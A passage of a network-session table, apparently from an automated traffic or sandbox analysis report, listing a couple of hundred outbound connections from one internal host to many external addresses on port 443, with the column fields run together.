                                        12834192.168.2.135480697.135.199.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12835192.168.2.1349162159.177.228.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12836192.168.2.1345296120.232.44.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12837192.168.2.1333890125.156.4.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12838192.168.2.134692872.70.172.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12839192.168.2.133932679.246.180.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12840192.168.2.134032297.249.121.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12841192.168.2.1354242181.199.3.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12842192.168.2.134435073.43.113.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12843192.168.2.134412020.241.93.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12844192.168.2.1349006131.237.213.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12845192.168.2.136063877.236.112.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12846192.168.2.1353610198.121.91.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12847192.168.2.1351936132.155.254.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12848192.168.2.134499687.129.121.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12849192.168.2.1341930106.75.187.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12850192.168.2.1340324182.98.156.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12851192.168.2.136014824.19.84.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12852192.168.2.1357142213.180.163.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12853192.168.2.1336452143.168.76.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12854192.168.2.135260062.199.65.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12855192.168.2.1341648124.104.230.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12856192.168.2.1339500156.96.6.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12857192.168.2.1355558195.14.217.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12858192.168.2.134499271.57.208.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12859192.168.2.1348290105.82.91.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12860192.168.2.1347420119.249.73.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12861192.168.2.1346840186.64.2.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12862192.168.2.133684237.128.24.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12863192.168.2.1336476194.182.179.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12864192.168.2.134656854.26.226.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12865192.168.2.1359680201.45.43.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12866192.168.2.135898650.23.94.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12867192.168.2.134993437.221.77.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12868192.168.2.1338958124.184.58.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12869192.168.2.1339748164.34.116.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12870192.168.2.1353274137.189.89.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12871192.168.2.134604036.212.211.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12872192.168.2.1353838131.111.202.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12873192.168.2.1341284209.4.189.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12874192.168.2.135748014.31.3.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12875192.168.2.1343580139.89.139.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12876192.168.2.1358778194.63.22.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12877192.168.2.1353356155.13.147.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12878192.168.2.1357512183.121.222.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12879192.168.2.135523486.211.139.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12880192.168.2.135512694.204.205.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12881192.168.2.1342866130.152.72.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12882192.168.2.133445468.128.186.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12883192.168.2.135325862.150.124.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12884192.168.2.1353156219.50.215.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12885192.168.2.134819637.111.48.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12886192.168.2.1346996111.239.16.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12887192.168.2.1360420121.110.24.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12888192.168.2.134689069.180.240.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12889192.168.2.134627263.215.199.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12890192.168.2.1357748129.123.30.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12891192.168.2.133516297.71.163.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12892192.168.2.135650064.65.51.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12893192.168.2.1346372124.148.242.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12894192.168.2.133653847.142.159.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12895192.168.2.1336374192.74.218.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12896192.168.2.1347134143.34.247.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12897192.168.2.134520042.191.253.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12898192.168.2.135545088.101.223.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12899192.168.2.1357728173.241.126.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12900192.168.2.1341540160.249.246.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12901192.168.2.134657636.22.30.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12902192.168.2.134421661.164.173.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12903192.168.2.1344398113.21.201.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12904192.168.2.134413251.144.119.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12905192.168.2.133715064.96.113.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12906192.168.2.1337246107.155.226.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12907192.168.2.133610466.27.39.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12908192.168.2.135138823.53.23.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12909192.168.2.134362227.207.34.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12910192.168.2.1342618102.255.98.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12911192.168.2.134523866.29.81.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12912192.168.2.1347980207.65.88.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12913192.168.2.135385859.8.63.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12914192.168.2.1348552123.235.188.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12915192.168.2.1342934152.141.47.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12916192.168.2.134491839.251.75.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12917192.168.2.135783236.25.176.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12918192.168.2.1355548145.85.141.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12919192.168.2.1333394108.161.201.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12920192.168.2.134578866.85.45.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12921192.168.2.133716680.87.49.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12922192.168.2.1358392102.239.193.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12923192.168.2.134337676.204.120.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12924192.168.2.135688672.12.194.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12925192.168.2.1345088219.19.235.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12926192.168.2.1348150118.18.156.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12927192.168.2.134536818.48.110.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12928192.168.2.135777836.89.175.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12929192.168.2.135937458.80.95.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12930192.168.2.133733461.74.20.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12931192.168.2.1348838165.248.88.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12932192.168.2.1351498116.191.105.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12933192.168.2.1358122179.67.33.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12934192.168.2.135932648.17.53.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12935192.168.2.1340592139.136.67.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12936192.168.2.1344594176.93.186.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12937192.168.2.1337376185.121.240.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12938192.168.2.1339498209.151.143.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12939192.168.2.135541439.231.138.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12940192.168.2.133934224.227.51.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12941192.168.2.1353504146.212.83.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12942192.168.2.133958091.79.201.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12943192.168.2.1336794158.120.187.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12944192.168.2.134452639.49.75.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12945192.168.2.1343472171.46.171.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12946192.168.2.1342506144.120.160.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12947192.168.2.135862664.65.231.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12948192.168.2.134768481.128.138.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12949192.168.2.13583244.51.254.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12950192.168.2.134163894.169.21.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12951192.168.2.133627094.202.97.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12952192.168.2.1359768133.146.85.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12953192.168.2.134303637.135.9.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12954192.168.2.135593464.254.128.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12955192.168.2.133741685.67.1.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12956192.168.2.1352278198.56.140.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12957192.168.2.1336906111.164.242.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12958192.168.2.133595059.30.187.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12959192.168.2.1335088196.25.76.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12960192.168.2.1333252141.181.139.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12961192.168.2.134107293.224.215.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12962192.168.2.1348660181.232.229.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12963192.168.2.135767017.84.208.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12964192.168.2.1349554155.99.222.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12965192.168.2.1344766131.82.138.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12966192.168.2.134385677.141.165.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12967192.168.2.1335940197.51.171.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12968192.168.2.1354370205.92.181.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12969192.168.2.135198663.120.58.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12970192.168.2.1334334220.144.148.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12971192.168.2.1357714192.242.17.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12972192.168.2.1348026210.57.19.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12973192.168.2.1357166132.254.89.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12974192.168.2.133420482.20.56.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12975192.168.2.1335036153.241.79.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12976192.168.2.135357438.205.155.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12977192.168.2.134395265.191.78.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12978192.168.2.1357852101.82.254.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12979192.168.2.1360632153.12.150.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12980192.168.2.1343436195.173.219.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12981192.168.2.135304442.137.39.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12982192.168.2.1346444137.175.8.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12983192.168.2.134691897.178.30.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12984192.168.2.1333924158.161.132.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12985192.168.2.134565290.66.75.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12986192.168.2.1345620143.42.42.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12987192.168.2.13345149.99.235.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12988192.168.2.13534744.1.29.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12989192.168.2.1352376119.1.122.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12990192.168.2.1338244202.171.133.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12991192.168.2.135272825.251.196.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12992192.168.2.1360322153.89.17.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12993192.168.2.135940617.30.80.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12994192.168.2.135344613.156.41.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12995192.168.2.1349034145.31.156.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12996192.168.2.133315648.183.250.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12997192.168.2.134176679.37.71.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12998192.168.2.13450902.80.71.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12999192.168.2.1335964109.227.9.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13000192.168.2.1352556161.135.97.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13001192.168.2.1350320207.137.197.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13002192.168.2.1356288129.67.7.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13003192.168.2.136004643.171.48.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13004192.168.2.1333950105.168.228.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13005192.168.2.1336614177.136.118.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13006192.168.2.133338040.219.102.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13007192.168.2.135410083.250.118.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13008192.168.2.136072076.87.135.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13009192.168.2.1354784211.135.120.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13010192.168.2.1341440222.118.120.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13011192.168.2.134102064.101.107.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13012192.168.2.134479637.47.5.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13013192.168.2.134830041.0.23.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13014192.168.2.1345254110.251.101.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13015192.168.2.133283241.142.163.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13016192.168.2.1360674128.230.35.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13017192.168.2.1354000175.156.26.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13018192.168.2.135094447.60.113.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13019192.168.2.135913047.27.151.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13020192.168.2.1336618184.251.152.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13021192.168.2.13507741.181.144.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13022192.168.2.134161245.39.64.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13023192.168.2.1352804202.114.7.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13024192.168.2.1340256116.134.227.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13025192.168.2.1352426207.146.77.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13026192.168.2.1351532194.100.26.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13027192.168.2.1348858151.172.236.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13028192.168.2.133750080.239.136.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13029192.168.2.135366612.152.94.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13030192.168.2.135725412.206.135.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13031192.168.2.1345480143.230.1.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13032192.168.2.1337534147.104.112.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13033192.168.2.1357832144.217.83.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13034192.168.2.1356826124.19.210.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13035192.168.2.1334416134.79.121.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13036192.168.2.1346930220.193.57.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13037192.168.2.135292262.81.200.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13038192.168.2.1353574141.129.69.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13039192.168.2.1336102197.24.202.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13040192.168.2.1351798104.119.85.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13041192.168.2.135792025.175.202.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13042192.168.2.135916863.173.81.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13043192.168.2.1351446164.14.206.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13044192.168.2.1336150162.157.246.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13045192.168.2.1346404160.26.35.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13046192.168.2.1360462130.46.182.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13047192.168.2.1359790208.15.127.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13048192.168.2.134561663.232.82.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13049192.168.2.1334586179.6.244.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13050192.168.2.1334492217.211.158.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13051192.168.2.135380857.199.195.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13052192.168.2.1360236149.221.89.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13053192.168.2.1334076130.76.20.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13054192.168.2.133583474.79.109.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13055192.168.2.133925437.144.66.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
